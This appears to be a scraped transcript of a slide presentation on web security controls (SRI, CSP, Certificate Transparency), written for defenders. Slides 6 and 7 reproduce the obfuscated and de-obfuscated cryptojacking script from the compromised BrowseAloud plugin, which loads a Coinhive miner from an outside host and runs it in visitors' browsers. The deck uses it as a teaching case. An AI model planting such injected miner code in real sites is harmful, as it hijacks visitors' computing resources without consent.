modern web security patterns
play

Modern Web Security Patterns Chad Hollman Analyst, County of - PowerPoint PPT Presentation

Aug 30, 2023 •434 likes •1.05k views

Modern Web Security Patterns Chad Hollman Analyst, County of Sacramento Department of Technology Current Issues of Web Development Security Subresource Integrity Checking Content Security Policies HTTP Public Key Pinning Certificate

  1. Modern Web Security Patterns Chad Hollman Analyst, County of Sacramento Department of Technology

  2. Current Issues of Web Development Security Subresource Integrity Checking Content Security Policies HTTP Public Key Pinning Certificate Authorization Authority Security Contacts Standard

  3. Current Issues of Web Development Security Subresource Integrity Checking Content Security Policies Expect Certificate Transparency Certificate Authorization Authority Security Contacts Standard

  4. Current Issues of Web Development Security Subresource Integrity Checking Content Security Policies Expect Certificate Transparency Certificate Authorization Authority Security Contacts Standard

  5. Current Issues of Web Development Security Government, health-care, and education web sites with an embedded crypto-miner

  6. Current Issues of Web Development Security Obfuscated javascript with crypto-miner /* [Warning] Do not copy or self host this file, you will not be supported *//* BrowseAloud Plus v2.5.0 (13-09-2017) */ window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63 \x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x27\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70 \x74\x27 \x73\x72\x63\x3d\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x6f\x69\x6e\x68\x69\x76 \x65\x2e\x63\x6f\x6d\x2f\x6c\x69\x62\x2f\x63\x6f\x69\x6e\x68\x69\x76\x65\x2e\x6d \x69\x6e\x2e\x6a\x73\x3f\x72\x6e\x64\x3d"+window["\x4d\x61\x74\x68"]["\x72\x61\x 6e\x64\x6f\x6d"]()+"\x27\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e");window["\x64\ x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\ x74\x3e \x69\x66 \x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x61\x72\x65\x43 \x6f\x6e\x63\x75\x72\x72\x65\x6e\x63\x79 \x3e \x31\x29\x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d \x7b\x74\x68\x72\x65\x61\x64\x73\x3a

  7. Current Issues of Web Development Security De-obfuscated crypto-miner window["document"]["write"]("write type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?rnd="+window["Math"]["random"]()+" '></script>");window["document"]["write"]('<script> if (navigator.hardwareConcurrency > 1){ var cpuConfig = {threads: Math.round(navigator.hardwareConcurrency/3),throttle:0.6}} else { var cpuConfig = {threads: 8,throttle:0.6}} var miner = new CoinHive.Anonymous(\'1GdQGpY1pivrGlVHSp5P2IIr9cyTzzXq\', cpuConfig);miner.start();</script>');

  8. Current Issues of Web Development Security Subresource Integrity Checking Content Security Policies Expect Certificate Transparency Certificate Authorization Authority Security Contacts Standard

  9. How do they work?

  10. It’s really easy

  11. browser requests external resource

  12. cdn returns browser requests resource external resource

  13. cdn returns browser requests browser hashes resource external resource returned resource

  14. cdn returns browser requests browser hashes resource external resource returned resource browser compares hash against integrity attribute in tag

  15. cdn returns browser requests browser hashes resource external resource returned resource browser compares content is loaded hash against integrity attribute in tag

  16. cdn returns browser requests browser hashes resource external resource returned resource browser compares content is loaded hash against integrity attribute in tag content is not loaded

  17. Embedding an SRI in your site First, generate the cryptographic hash of your external script https://www.srihash.org/

  18. Embedding an SRI in your site Second, add the generated hash to the script call <script src="https://example.com/example-framework.js" integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC" ...> </script>

  19. Subresource Integrity Checking When SRIs fail

  20. Subresource Integrity Checking Are SRIs supported by my browser?

  21. But what happens if the script updates?

  22. Current Issues of Web Development Security Subresource Integrity Checking Content Security Policies Expect Certificate Transparency Certificate Authorization Authority Security Contacts Standard

  23. Content Security Policies The complement to SRIs A good content security policy (CSP) would have stopped the crypto miner from being loaded Can be implemented as part of a response header or meta tags Allow reporting-only on CSP violations without actually enforcing a CSP Allow you to white-list the sources of different content types Effectively says, “yes you can run whatever you want in this file, but you can only load from these places”

  24. Content Security Policies Content security policies as meta tags <meta http-equiv="Content-Security-Policy" content="default-src 'none'; connect-src bloghelpers.troyhunt.com links.services.disqus.com www.google-analytics.com stats.g.doubleclick.net syndication.twitter.com troyhunt.report-uri.com troyhunt.report-uri.com; font-src 'self' cdnjs.cloudflare.com fonts.gstatic.com; frame-src disqus.com c.disquscdn.com www.google.com www.youtube.com player.vimeo.com twitter.com platform.twitter.com syndication.twitter.com omny.fm pastebin.com; img-src 'self' c.disquscdn.com referrer.disqus.com stats.g.doubleclick.net www.google-analytics.com www.gstatic.com syndication.twitter.com platform.twitter.com *.twimg.com data:; script-src 'self' c.disquscdn.com disqus.com troyhunt.disqus.com www.google.com www.google- analytics.com www.gstatic.com cdnjs.cloudflare.com platform.twitter.com cdn.syndication.twimg.com syndication.twitter.com gist.github.com/troyhunt/ 'sha256-dblwN9MUF0KZKfqYU7U9hiLjNSW2nX1koQRMVTelpsA=' 'sha256- 4JqPqO/eQLWuWw1AE7dCvI9hPwiBcw0gy7uoLqS0ncg=' 'sha256- q7PyCIWqx04xiOpJNrqiwsSEIdeaqyhUMFifRsUwUDk=' cdn.report-uri.com; style-src 'self' 'unsafe-inline' c.disquscdn.com cdnjs.cloudflare.com fonts.googleapis.com platform.twitter.com ton.twimg.com assets-cdn.github.com github.githubassets.com; prefetch-src c.disquscdn.com disqus.com; upgrade-insecure-requests">

  25. Content Security Policies Content security policies with reporting as response headers

  26. Content Security Policies Content security policies with a reporting URL handled by my web server

  27. Content Security Policies Content security policies as response headers in the browser

  28. Content Security Policies Content security policy violations in the browser

  29. Content Security Policies Content security policy reporting with embedded script <script type=“text/json” id=“csp-report-uri”> { "keys": [ "blockedURI", "columnNumber", "disposition", "documentURI", "effectiveDirective", "lineNumber", "originalPolicy", "referrer", "sample", "sourceFile", "statusCode", "violatedDirective” ], "reportUri" : "https://troyhunt.report-uri.com/r/d/csp/enforce" } </script>

  30. Content Security Policies Upgrade insecure requests

  31. Content Security Policies Upgrade insecure requests

  32. Content Security Policies Upgrade insecure requests

  33. Content Security Policies Upgrade insecure requests

  34. Content Security Policies Upgrade insecure requests

  35. Content Security Policies Upgrade insecure requests

  36. default-src Serves as a fallback for all other fetch directives connect-src Restricts the URLs which can be loaded using script interfaces font-src Specifies valid sources for fonts loaded using @font-face frame-src Specifies valid sources for nested browsing contexts loading using elements such as <frame> and <iframe> img-src Specifies valid sources of images and favicons media-src Specifies valid sources for loading media using <audio> , <video> and <track> elements script-src Specifies valid sources for JavaScript <script> elements style-src Specifies valid sources for stylesheets worker-src Specifies valid sources for Worker , SharedWorker , or ServiceWorker scripts https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy

  37. Content Security Policies Are CSPs supported by my browser?

  38. Current Issues of Web Development Security Subresource Integrity Checking Content Security Policies Expect Certificate Transparency Certificate Authorization Authority Security Contacts Standard

  39. https://www.smashingmagazine.com/be-afraid-of-public-key-pinning/

  40. 2011 DigiNotar Dutch Certificate Authority

  41. 500 fake SSL certificates including sites like facebook.com and google.com

  42. Expect Certificate Transparency CT is a tool that allows you to detect when a fake certificate has been issued When a CA participates in the program, it must log all certificates they issue in a publicly searchable log The logs are monitored by an application that can report to you whenever a new cert for one of your domains is issued If the cert was issued in error (or maliciously), you can immediately take steps to have it revoked

  43. Expect Certificate Transparency Expect CT tells the browser you only want it to trust certificates signed by CAs that have Certificate Transparency enabled

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Security Patterns M. Schumacher, E. Fernandez-Buglioni, D. Hybertson, F. Bushmann, and P.

Security Patterns M. Schumacher, E. Fernandez-Buglioni, D. Hybertson, F. Bushmann, and P.

Security Patterns M. Schumacher, E. Fernandez-Buglioni, D. Hybertson, F. Bushmann, and P. Sommerlad, Security Patterns: Integrating Security and Systems Engineering, John Wiley and Sons Ltd., 2006 Lecture outline What is pattern? What is

1.04k views • 83 slides
A Second Look At ML Chapter Seven Modern Programming Languages, 2nd ed. 1 Outline Patterns

A Second Look At ML Chapter Seven Modern Programming Languages, 2nd ed. 1 Outline Patterns

A Second Look At ML Chapter Seven Modern Programming Languages, 2nd ed. 1 Outline Patterns Local variable definitions A sorting example Chapter Seven Modern Programming Languages, 2nd ed. 2 Two Patterns You Already Know We

939 views • 38 slides
Cyber Security A Modern Tale of a Dissonant Relationship BTB Security and me BTB Security

Cyber Security A Modern Tale of a Dissonant Relationship BTB Security and me BTB Security

Cyber Security A Modern Tale of a Dissonant Relationship BTB Security and me BTB Security Founded in 2006 Technical security services, MDR Me Ron Schlecht German word for BAD Ron.Schlecht@btbsecurity.com

432 views • 8 slides
TO ANY COUNT , TO ALL COUNTS, TO WHAT IS MAN: FINDING PATTERNS OF GENDER IN EARLY MODERN

TO ANY COUNT , TO ALL COUNTS, TO WHAT IS MAN: FINDING PATTERNS OF GENDER IN EARLY MODERN

TO ANY COUNT , TO ALL COUNTS, TO WHAT IS MAN: FINDING PATTERNS OF GENDER IN EARLY MODERN PLAYS HEATHER FROEHLICH UNIVERSITY OF STRATHCLYDE @HEATHERFRO ALLS WELL THAT ENDS WELL ACT II SCENE III 1096-1104 SLICING AND DICING

698 views • 55 slides
Security vulnerabilities, exploits and attack patterns: 15 years of art, pseudo-science, fun &amp;

Security vulnerabilities, exploits and attack patterns: 15 years of art, pseudo-science, fun &amp;

15th USENIX Security Symposium | July 31st August 4th 2006 | Vancouver, B.C. - Canada Security vulnerabilities, exploits and attack patterns: 15 years of art, pseudo-science, fun &amp; profit Ivn Arce Core Security Technologies Humboldt

767 views • 41 slides
MODERN 1 MODERN 2 MODERN 3 MODERN 4 MODERN A peep at some distant orb has power to raise

MODERN 1 MODERN 2 MODERN 3 MODERN 4 MODERN A peep at some distant orb has power to raise

MODERN 1 MODERN 2 MODERN 3 MODERN 4 MODERN A peep at some distant orb has power to raise and purify our thoughts like a strain picture, or a passage from the grander poets. It always does one good. 5 MODERN 6 MODERN 7 MODERN 8

524 views • 24 slides
patterns and anti-patterns m e a n s D E P E N D E N C I E S L I A B I L I T Y O P I N I O N AT

patterns and anti-patterns m e a n s D E P E N D E N C I E S L I A B I L I T Y O P I N I O N AT

patterns and anti-patterns m e a n s D E P E N D E N C I E S L I A B I L I T Y O P I N I O N AT E D P R O D F O R A L L Firebase Functions User Browser (Auth, Assets, DB, Security) (running Angular) Auth0 Firebase User Browser

609 views • 19 slides
Security in modern CPU Guillaume Bouffard ( guillaume.bouffard@ssi.gouv.fr ) Hardware Security

Security in modern CPU Guillaume Bouffard ( guillaume.bouffard@ssi.gouv.fr ) Hardware Security

Security in modern CPU Guillaume Bouffard ( guillaume.bouffard@ssi.gouv.fr ) Hardware Security Labs National Cybersecurity Agency of France (ANSSI) DIENS, ENS, CNRS, PSL University Workshop SILM 21 November 2019 Who am I? Me Expert in

1.18k views • 80 slides
Patterns for Modern Fortran Variation points Accomodate for change Partial differential

Patterns for Modern Fortran Variation points Accomodate for change Partial differential

High-Performance Design Patterns for Modern Fortran Variation points Accomodate for change Partial differential equation solvers Which coordinate system? How many dimensions? Coordinate-free programming Independent of dimension,

330 views • 10 slides
Mining Data for Patterns Fall 2013 Carola Wenk Analyzing Data Modern technology allows us to

Mining Data for Patterns Fall 2013 Carola Wenk Analyzing Data Modern technology allows us to

Mining Data for Patterns Fall 2013 Carola Wenk Analyzing Data Modern technology allows us to gather many forms of information at an unprecedented rate. What do we do with all of it? Wed like to learn from it. What does this mean? 1. Find

705 views • 53 slides
Tutorial: Security patterns and secure systems design using UML Eduardo B. Fernandez and Maria

Tutorial: Security patterns and secure systems design using UML Eduardo B. Fernandez and Maria

Tutorial: Security patterns and secure systems design using UML Eduardo B. Fernandez and Maria M. Larrondo Petrie Dept. of Computer Science and Eng. Florida Atlantic University www.cse.fau.edu/~security {ed, maria}@cse.fau.edu ICWMC/ICCGI

2.27k views • 184 slides
Design Patterns Applications Programming What is design patterns? The design patterns are

Design Patterns Applications Programming What is design patterns? The design patterns are

10/26/2011 G52APR Design Patterns Applications Programming What is design patterns? The design patterns are language- Design Patterns 1 independent strategies for solving common object-oriented design problems. Jiawei Li (Michael)

316 views • 8 slides
More Design Patterns Horstmann ch.10.1,10.4 Design patterns Structural design patterns

More Design Patterns Horstmann ch.10.1,10.4 Design patterns Structural design patterns

More Design Patterns Horstmann ch.10.1,10.4 Design patterns Structural design patterns Adapter Composite Decorator Proxy Behavioral design patterns Iterator Observer Strategy Template method

777 views • 16 slides
Building a Modern Security Engineering Team zane@signalsciences.com @zanelackey Who is this guy

Building a Modern Security Engineering Team zane@signalsciences.com @zanelackey Who is this guy

Building a Modern Security Engineering Team zane@signalsciences.com @zanelackey Who is this guy anyway? Built and led the Etsy Security Team Spoiler alert: what this presentation is about Co-founded Signal Sciences This talk is

814 views • 70 slides
Map Reduce and Design Patterns Lecture 5 Fang Yu Software Security Lab. Department of

Map Reduce and Design Patterns Lecture 5 Fang Yu Software Security Lab. Department of

Chapter 5 Map Reduce and Design Patterns Lecture 5 Fang Yu Software Security Lab. Department of Management Information Systems College of Commerce, National Chengchi University http://soslab.nccu.edu.tw Cloud Computation, April 7, 2015 1 /

458 views • 7 slides
Map Reduce and Design Patterns Lecture 4 Fang Yu Software Security Lab. Department of

Map Reduce and Design Patterns Lecture 4 Fang Yu Software Security Lab. Department of

Chapter 4 Map Reduce and Design Patterns Lecture 4 Fang Yu Software Security Lab. Department of Management Information Systems College of Commerce, National Chengchi University http://soslab.nccu.edu.tw Cloud Computation, March 31, 2015 1 /

131 views • 10 slides
IoT: Taking PKI Where No PKI Has Gone Before Presented by: Scott Rea DigiCert Sr. PKI Architect

IoT: Taking PKI Where No PKI Has Gone Before Presented by: Scott Rea DigiCert Sr. PKI Architect

AllSeen Summit 2015: IoT: Taking PKI Where No PKI Has Gone Before Presented by: Scott Rea DigiCert Sr. PKI Architect ALLSEEN ALLIANCE Agenda Slide Title 3 Trust and PKI 9 Web Security - PKI example 26

450 views • 41 slides
PKI and Certificate Security Outline Motivation Certificates Public Key Infrastructure

PKI and Certificate Security Outline Motivation Certificates Public Key Infrastructure

IN3210 Network Security PKI and Certificate Security Outline Motivation Certificates Public Key Infrastructure Threats to certificates / PKI Protecting certificates / PKI 2 Certificates Motivation 3 Motivation: TLS

1.68k views • 108 slides
Short Term Certificates d raft-sheffer-acme-star-lurk-00 Yaron Sheffer, Diego Lopez, Thomas

Short Term Certificates d raft-sheffer-acme-star-lurk-00 Yaron Sheffer, Diego Lopez, Thomas

Short Term Certificates d raft-sheffer-acme-star-lurk-00 Yaron Sheffer, Diego Lopez, Thomas Fossati, Oscar Gonzalez de Dios IETF 97, Seoul Motivation Delegate the authorization to publish a web site Securely: owner can revoke the

488 views • 10 slides
WAVE: A Decentralized Authorization Framework with Transitive Delegation Michael P Andersen, Sam

WAVE: A Decentralized Authorization Framework with Transitive Delegation Michael P Andersen, Sam

WAVE: A Decentralized Authorization Framework with Transitive Delegation Michael P Andersen, Sam Kumar , Hyung-Sin Kim, John Kolb, Kaifei Chen, Moustafa AbdelBaky, Gabe Fierro, David E. Culler, Raluca Ada Popa This material is based on work

1.25k views • 30 slides
Applications for NDN James Kasten University of Michigan Network Authentication Public Key

Applications for NDN James Kasten University of Michigan Network Authentication Public Key

Applications for NDN James Kasten University of Michigan Network Authentication Public Key Infrastructure Pairing Keys with Identity or Authority Major Challenges Management Distribution Revocation Renewal Lets

391 views • 10 slides
A VOMS overview Andrea Ceccanti (on behalf of the VOMS team) NRENS and Grids Workshop Malaga,

A VOMS overview Andrea Ceccanti (on behalf of the VOMS team) NRENS and Grids Workshop Malaga,

Enabling Grids for E-sciencE A VOMS overview Andrea Ceccanti (on behalf of the VOMS team) NRENS and Grids Workshop Malaga, 29-30/11/07 www.eu-egee.org EGEE-II INFSO-RI-031688 EGEE and gLite are registered trademarks Outline Enabling Grids

488 views • 25 slides
Overview of IEEE 802.16 Security David Johnston &amp; Jesse Walker Presented By: Anil Bazaz

Overview of IEEE 802.16 Security David Johnston &amp; Jesse Walker Presented By: Anil Bazaz

Overview of IEEE 802.16 Security David Johnston &amp; Jesse Walker Presented By: Anil Bazaz CS6204, Spring 2005 Intro to IEEE 802.16 Standard for Wireless Metropolitan Area Networks (WMANs) Flavors: IEEE 802.16-2001, 802.16a, 802.16c,

844 views • 14 slides
Measuring Adoption of Security Additions to the HTTPS Ecosystem Quirin Scheitle July 16, 2018

Measuring Adoption of Security Additions to the HTTPS Ecosystem Quirin Scheitle July 16, 2018

Chair of Network Architectures and Services Department of Informatics Technical University of Munich Measuring Adoption of Security Additions to the HTTPS Ecosystem Quirin Scheitle July 16, 2018 Applied Networking Research Workshop (ANRW)

303 views • 11 slides

More recommend